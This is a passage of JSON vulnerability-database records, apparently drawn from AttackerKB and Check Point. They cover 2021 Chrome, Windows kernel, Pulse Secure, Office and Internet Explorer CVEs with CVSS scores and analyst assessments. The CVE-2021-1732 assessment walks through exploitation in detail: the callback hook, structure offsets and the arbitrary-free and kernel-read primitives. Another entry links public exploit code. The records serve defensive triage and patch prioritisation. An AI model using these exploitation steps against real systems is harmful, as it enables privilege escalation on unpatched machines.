page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 3:06pm UTC reported:\n\nAccording to <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/> this appears to have been used along with CVE-2021-31955 and CVE-2021-31956, a Windows kernel information leak and a Windows LPE vulnerability, to form a full RCE to go from a user browsing a web page to full SYSTEM control over a target Windows device. This is an extremely powerful and valuable exploit chain, and many exploit brokers are willing to pay large sums of money for these chains as they often are very valuable to nation states who wish to use them for their intelligence operations.\n\nOverall though, on its own it seems like this bug wasn\u2019t super valuable as you only get RCE within the sandbox itself, which is why it was then chained with a Windows kernel bug to escape the Chrome sandbox and gain RCE as SYSTEM on the target device. Therefore the risk for this vulnerability alone is lower, however if we keep in mind the other bugs that existed at the time, the overall risk is quite high.\n\nThere also appears to have been public exploit code available for this vulnerability, available at <https://github.com/avboy1337/1195777-chrome0day>, which was potentially reused by the attackers. In any case at the time that code was released the bug was still unpatched which lead researchers at Kaspersky to conclude that its likely attackers used the code from <https://github.com/avboy1337/1195777-chrome0day> in their attack.\n\nOtherwise this is your typical V8 type confusion bug. V8 seems to have had quite a few type confusion bugs in the past so this is nothing too new. If you want to limit exposure, disable JavaScript in your browser on untrusted sites, which will help prevent users from being exploited by these types of attacks as most of them rely on JavaScript to do set up the environment in Chrome appropriately. That being said disabling JavaScript will break most sites so take this with a grain of salt :)\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-26T00:00:00", "type": "attackerkb", "title": "CVE-2021-21224", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-04-28T00:00:00", "id": "AKB:160D34D9-2175-4B27-87F8-0CED51121F50", "href": "https://attackerkb.com/topics/fLcfbPxB38/cve-2021-21224", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:10:05", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-27072.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at April 13, 2021 8:41pm UTC reported:\n\nAh, another day, another Win32k privilege escalation used in the wild. [Securelist has a good write-up](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>) on this bug, which they discovered because it was used in a BITTER APT zero-day attack in (it sounds like) conjunction with [CVE-2021-1732](<https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e>) (there\u2019s a Metasploit module for the second vuln).\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-13T00:00:00", "type": "attackerkb", "title": "CVE-2021-28310", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2021-27072", "CVE-2021-28310"], "modified": "2021-04-17T00:00:00", "id": "AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65", "href": "https://attackerkb.com/topics/pKKVzHnVRA/cve-2021-28310", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-31T20:18:07", "description": "Windows NTFS Elevation of Privilege Vulnerability \nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nAdditionally, an attacker could convince a local user to open a malicious file. The attacker would have to convince the user to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file.\n\nThe team at Kaspersky have reported threat actors are exploiting this Microsoft Windows OS kernel vulnerability\n\nSource: <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 4:04pm UTC reported:\n\nThis is a heap buffer overflow in `ntfs.sys`, one of the Windows kernel drivers, which was patched in June 2021. Heap vulnerabilities in the kernel are notoriously unreliable and hard to exploit, particularly given recent mitigations in Windows 8 and then later in Windows 10 that have introduced additional randomness to the kernel heap as well as additional state checks that will result in Windows terminating immediately if data does not look to be valid. Therefore realize that whilst this exploit has been exploited in the wild, I would imagine the reliability may be questionable or there may have been considerable work done behind the scenes to make the exploit more reliable.\n\nIn any case, the affected function is `NtfsQueryEaUserEaList()` in `ntfs.sys` which processes a list of extended attributes (this is where the `ea` part of the function name comes from) for a file and saves the retrieved values to a buffer. The problem here though is that users can make a Windows system call to access this function and `NtfsQueryEaUserEaList()` and its possible to control the size of the output buffer. However the output buffer\u2019s size has to be 32 bit aligned. This causes an issue as whilst the code does check to make sure the output buffer can hold the content of the extended attribute list with padding, it doesn\u2019t check for integer underflows, meaning that the check is done as though the number was an unsigned integer, yet when copying memory its treated as a signed integer, which can result in the number underflowing and becoming a large positive number, such that a lot of memory is copied into a very small buffer.\n\nThis is a particularly interesting case as most of the time when one combines an integer underflow/overflow with a heap buffer vulnerability, things don\u2019t tend to pan out so well due to the user corrupting too much memory to reliably control the heap. This can cause issues later on when Windows checks the heap state and suddenly finds everything is trashed, resulting in a BSOD if one corrupts kernel heap memory. For this reason, I\u2019m interested to see how the attackers actually managed to accurately control heap memory in this scenario to exploit the vulnerability.\n\nFrom the advisory we are given some hints that the Windows Notification Facility (WNF) was used along with this vulnerability to get arbitrary memory read and write primitives, which is a new kernel exploitation strategy I have not heard about before. It appears this was also new to Kaspersky as well as they mention they will be publishing more information about this technique in the future.\n\nAdditionally, showcasing the sophistication of the attackers who exploited this vulnerability, they also used a rarely used `PreviousMode` overwrite instead of stealing overwriting the `Token` field of the `EPROCESS` structure to steal the token. As mentioned at <https://github.com/oct0xor/presentations/blob/master/2019-02-Overview%20of%20the%20latest%20Windows%20OS%20kernel%20exploits%20found%20in%20the%20wild.pdf>, this field controls which mode the kernel was in prior to performing a system call. This can allow an attacker to perform sensitive actions by essentially tricking the OS into thinking a system call was made from kernel mode when in reality it was not.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-31956", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2021-06-08T00:00:00", "id": "AKB:03F5DDB7-DFAF-4815-9563-05762A387A0A", "href": "https://attackerkb.com/topics/Xixbnqn9qC/cve-2021-31956", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-15T02:09:19", "description": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.\n\n \n**Recent assessments:** \n \n**awesom3alex** at April 21, 2021 2:01pm UTC reported:\n\nPulse Secure Pulse Connect Secure 9.1.R.11.3 and earlier are affected by an authenticated bypass vulnerability, CVE-2021-22893, when exploited it is very likely the threat actor can achieve remote code execution. Exploitation has been observed by APT 5 (UNC2630) and UNC2717.\n\nA Proof-of-Concept exploit is not publicly available.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-23T00:00:00", "type": "attackerkb", "title": "CVE-2021-22893", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-04-27T00:00:00", "id": "AKB:5BE82C1E-061F-4C04-93A2-1C15BBDE9337", "href": "https://attackerkb.com/topics/PqQGYGwWdM/cve-2021-22893", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-09T20:11:00", "description": "Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka \u201cMicrosoft Office/WordPad Remote Code Execution Vulnerability w/Windows API.\u201d\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:44pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1 \n\n * Associated Malware: FINSPY, LATENTBOT, Dridex \n\n * Mitigation: Update affected Microsoft products with the latest security patches \n\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-0199> \n\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133g>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133h>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133p>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-12T00:00:00", "type": "attackerkb", "title": "CVE-2017-0199", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2021-07-27T00:00:00", "id": "AKB:F48CAEEE-E809-405D-B7AD-48D94140C67D", "href": "https://attackerkb.com/topics/1wEJlwFAYV/cve-2017-0199", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-17T05:06:46", "description": "This CVE is the result of a patch bypass for CVE-2020-0986, reported to Microsoft by Kaspersky in December 2019 and patched in June 2020. Google Project Zero researcher Maddie Stone notified Microsoft on September 24, 2020 that the fix for Kaspersky\u2019s reported vulnerability was incomplete. CVE-2020-17008 was [published on December 23, 2020](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2096>) as part of Google\u2019s 90-day disclosure deadline.\n\nNotably, CVE-2020-0986 was exploited in the wild as part of [Operation PowerFall](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>). Stone\u2019s tweet thread on the incomplete patch [is here](<https://twitter.com/maddiestone/status/1341781307508969473>).\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-30T00:00:00", "type": "attackerkb", "title": "CVE-2020-17008 splWOW64 Elevation of Privilege Patch Bypass", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-17008"], "modified": "2020-12-30T00:00:00", "id": "AKB:2BD24459-EE7D-4EB8-92A6-7C77689BCC8D", "href": "https://attackerkb.com/topics/cKeyeWef0b/cve-2020-17008-splwow64-elevation-of-privilege-patch-bypass", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-21T18:19:16", "description": "Internet Explorer Memory Corruption Vulnerability\n\n \n**Recent assessments:** \n \n**ccondon-r7** at April 05, 2021 1:20pm UTC reported:\n\nThere is now [public threat intelligence](<https://twitter.com/jeromesegura/status/1378584985792180227>) that the Purple Fox exploit kit has incorporated this vulnerability and is [exploiting it](<https://twitter.com/nao_sec/status/1378546891349106692>).\n\n**gwillcox-r7** at March 11, 2021 5:57pm UTC reported:\n\nThere is now [public threat intelligence](<https://twitter.com/jeromesegura/status/1378584985792180227>) that the Purple Fox exploit kit has incorporated this vulnerability and is [exploiting it](<https://twitter.com/nao_sec/status/1378546891349106692>).\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-11T00:00:00", "type": "attackerkb", "title": "CVE-2021-26411", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2021-26411"], "modified": "2021-03-18T00:00:00", "id": "AKB:925F84D3-4FE0-4A18-BAA9-170C701E718D", "href": "https://attackerkb.com/topics/WZgkdqe2vN/cve-2021-26411", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-26T23:01:58", "description": "Scripting Engine Memory Corruption Vulnerability\n\n \n**Recent assessments:** \n \n**architect00** at May 14, 2021 10:33am UTC reported:\n\n## Details\n\nThe vulnerability affects Internet Explorer 11 on all Windows Versions. It is located in the `jscript9.dll` library, which is used to execute javascript.\n\nPossible attack vectors:\n\n * website content \n\n * activeX components in office documents \n\n\nGoogle Project Zero released a PoC on 13.05.2021, which triggers the vulnerability and causes a crash. At the time of writing I could not find any weaponized exploit.\n\nThe CVSS rating of the vulnerability differs between Windows desktop versions and server versions. In server versions the CVSS _Privileges Required_ is set to _High_. Desktop versions are rated with CVSS _None_. The reason could be, that IE _enhanced protection mode_ is disabled on Windows desktop versions and enabled on server versions by default.\n\n## Rating explanation\n\nMy rating of the exploitability score was affected by the availability of the PoC and the Microsoft exploitability rating. In year 2020, Operation PowerFall was using a similar vulnerability (CVE-2020-1380) in IE. I expect to see exploits for CVE-2021-26419 in a similar context.\n\nAttackers might gain direct control over the host after exploitation without a sandbox escape. IE 11 does have a _enhanced protected mode (EPM)_, which runs IE in an AppContainer and acts as a sandbox. EPM was introduced with Windows 8 and is disabled by default on Windows desktop versions.\n\n## Sources\n\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26419> \n\n * <https://threatpost.com/wormable-windows-bug-dos-rce/166057/> \n\n * <https://bugs.chromium.org/p/project-zero/issues/detail?id=2157> \n\n * <https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/> \n\n * <https://securityintelligence.com/internet-explorer-ie-10-enhanced-protected-mode-epm-sandbox-research/> \n\n * <https://docs.microsoft.com/en-us/troubleshoot/browsers/enhanced-protected-mode-add-on-compatibility>\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "attackerkb", "title": "CVE-2021-26419", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2021-26419"], "modified": "2021-05-18T00:00:00", "id": "AKB:2F48FB8A-EF4C-468F-9F4F-8BB9BB5FEC97", "href": "https://attackerkb.com/topics/3ko2JYsW6g/cve-2021-26419", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-25T20:07:54", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at February 10, 2021 10:03pm UTC reported:\n\nA very interesting vulnerability in win32kfull.sys on Windows 10 devices up to and including 20H2. Although the exploit in the wild specifically targeted Windows 10 v1709 to Windows 10 v1909, as noted at <https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>, the researchers noted that the vulnerability could be modified to work on Windows 20H2 with minor modifications.\n\nFrom my perspective this is rather significant, particularly given this is a win32kfull.sys bug we are talking about here. Most of the primitives that made win32k exploitation easier were entirely wiped out by Microsoft which prompted a lot of researchers who previously spoke publicly about such primitives in conference talks and similar to go quiet. Whilst rumor has been that there were other primitives one could use for exploitation, they were considered closely guarded secrets due to the difficulty in finding them and the fact that Microsoft would be likely to patch them very quickly.\n\nThe new primitive that is used here appears to be setting tagMenuBarInfo.rcBar.left and tagMenuBarInfo.rcBar.top and then calling GetMenuBarInfo(), which allows one to perform an arbitrary read in kernel memory. This has not been discussed before but is similar to another concepted discussed in the paper \u201cLPE vulnerabilities exploitation on Windows 10 Anniversary Update\u201d at ZeroNights which mentioned using two adjacent Windows and then setting the cbwndExtra field of the first window to a large value to allow the first window to set all of the properties of the second window. By chaining this together the attacker could achieve an arbitrary read and write in kernel memory.\n\nThe bug itself stems from a xxxClientAllocWindowClassExtraBytes() callback within win32kfull!xxxCreateWindowEx. Specifically when xxxCreateWindowEx() creates a window object with a cbwndExtra field set, aka it has extra Window bytes, it will perform a xxxClientAllocWindowClassExtraBytes() callback to usermode to allocate the extra bytes for the Window.\n\nYou may be wondering why such callbacks are needed. Well a long time ago Windows used to handle all its graphics stuff in kernel mode, but then people realized that was too slow given increasing demands for speed, so they made most of the code operate in usermode with key stuff handled by kernel mode. This lead to a big rift and is the reason we have callbacks. Thats the nutshell version anyway but go read up on <http://mista.nu/research/mandt-win32k-slides.pdf> and <https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf> if you want to learn more. Its a fascinating read :)\n\nAnyway back on topic. Since xxxClientAllocWindowClassExtraBytes() is a callback that is under the attackers controller, the attacker can set a hook that will trigger when a xxxClientAllocWindowClassExtraBytes() callback is made and call NtUserConsoleControl() with the handle of the window that is currently being operated on. This will end up calling xxxConsoleControl() in kernel mode which will set *((tagWND+0x28)+0x128) to an offset, and will AND the flag at *((tagWND+0x28) + 0xE8) with 0x800 to indicate that the value of the WndExtra member is an offset from the base address of RtlHeapBase. Unfortunately, whatever value is returned by the hooked xxxClientAllocWindowClassExtraBytes() callback (aka whatever value the attacker chooses) will be used as the value of WndExtra, since remember we are meant to be allocating the address of this field at the time due to the earlier xxxCreateWindowEx() call needing to allocate memory for WndExtra.\n\nOnce this is done, the callback will be completed, execution will return to usermode, and a call to DestroyWindow() will be made from usermode. This will cause xxxDestroyWindow() to be called in kernel mode which will call xxxFreeWindow(), which will check if *((tagWND+0x28) + 0xE8) has the flag designated by 0x800 set, which it will due to the alterations made by xxxConsoleControl(). This will then result in a call to RtlFreeHeap() which will attempt to free an address designated by RtlHeapBase + offset, where offset is the value of WndExtra (which is taken from the xxxClientAllocWindowClassExtraBytes() callback and therefore completely controlled by the attacker).\n\nThis subsequently results in the attacker being able to free memory at an arbitrary address in memory.\n\nI\u2019ll not dive into a full detailed analysis of the rest of the exploitation steps as the article at <https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/> is very comprehensive but I will say from what I\u2019ve read there, there is enough detail that people of a decent skill level could probably recreate this exploit. It certainly isn\u2019t an easy exploit to recreate but the exploit goes into a lot of detail about the various mitigation bypasses that were used to make this exploit possible, which could help an attacker more readily recreate this bug.\n\nAgain, this exploit was exploited in the wild so it is possible for this bug to be recreated, it just might take some time for people to work out a few of the specifics needed to get a working exploit. If you are running Windows 10, it is highly advised to upgrade as soon as possible: everything I am reading here points to signs that this will be weaponized within the coming few weeks or months.\n\nAdditionally it should be noted that this exploit was noted to be capable of escaping Microsoft IE\u2019s sandbox (but not Google Chrome\u2019s) so if you are running Microsoft IE within your environment, its even more imperative that you patch this issue to prevent an attacker from combining this with an IE 0day and conducting a drive by attack against your organization, whereby simply browsing a website could lead to attackers gaining SYSTEM level privileges against affected systems.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-25T00:00:00", "type": "attackerkb", "title": "CVE-2021-1732", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2021-03-04T00:00:00", "id": "AKB:DFA2540D-E431-4CDE-B67A-7EA3F2B87A74", "href": "https://attackerkb.com/topics/7eGGM4Xknz/cve-2021-1732", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:33:33", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-13T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Win32k Elevation of Privilege (CVE-2021-28310)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28310"], "modified": "2021-04-13T00:00:00", "id": "CPAI-2021-0223", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:34:24", "description": "An information disclosure vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability would allow a remote attacker to obtain 